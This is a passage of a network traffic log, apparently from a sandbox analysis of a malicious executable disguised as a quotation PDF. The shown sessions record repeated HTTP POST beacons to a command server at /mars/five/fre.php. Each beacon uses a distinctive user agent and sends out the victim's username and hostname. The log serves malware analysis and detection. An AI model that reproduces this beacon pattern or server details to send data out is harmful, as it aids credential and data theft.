Jan 7, 2025 12:32:21.055150032 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:32:20 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49764	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:32:21.203125954 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:32:21.208839893 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:32:21.994616032 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:32:21 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49765	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:32:22.185805082 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:32:22.190721035 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:32:22.906075954 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:32:22 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49766	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:32:23.078553915 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:32:23.083462000 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:32:23.819855928 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:32:23 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49767	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:32:23.969023943 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:32:23.973870039 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:32:24.698086023 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:32:24 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49768	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:32:24.875807047 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:32:24.880635977 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:32:25.606833935 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:32:25 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49769	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:32:25.824960947 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:32:25.829746008 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:32:26.577548981 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:32:26 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49770	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:32:26.718461037 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:32:26.723357916 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:32:27.430458069 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:32:27 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49771	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:32:27.577661037 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:32:27.582509995 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:32:28.316294909 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:32:28 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49772	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:32:28.614263058 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:32:28.619054079 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:32:29.349251032 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:32:29 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49773	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:32:29.499579906 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:32:29.504390001 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:32:30.221826077 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:32:30 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49774	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:32:30.377583981 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:32:30.382420063 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:32:31.090928078 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:32:30 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49775	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:32:31.250375986 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:32:31.256603003 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:32:31.988487959 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:32:31 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49776	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:32:32.149305105 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:32:32.155613899 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:32:32.891259909 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:32:32 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49777	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:32:33.028031111 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:32:33.032901049 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:32:33.772023916 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:32:33 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49778	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:32:33.918819904 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:32:33.924411058 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:32:34.665445089 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:32:34 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49779	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:32:34.809441090 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:32:34.814296961 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:32:35.557409048 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:32:35 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49780	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:32:35.699280977 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:32:35.704113960 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:32:36.434782982 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:32:36 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49781	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:32:36.583699942 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:32:36.588546038 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:32:37.324584961 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:32:37 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49782	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:32:37.468777895 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:32:37.473583937 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:32:38.192630053 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:32:38 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49783	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:32:38.355763912 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:32:38.360546112 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:32:39.104120970 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:32:38 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	49784	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:32:39.248174906 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:32:39.253004074 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:32:39.957216978 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:32:39 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	49785	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
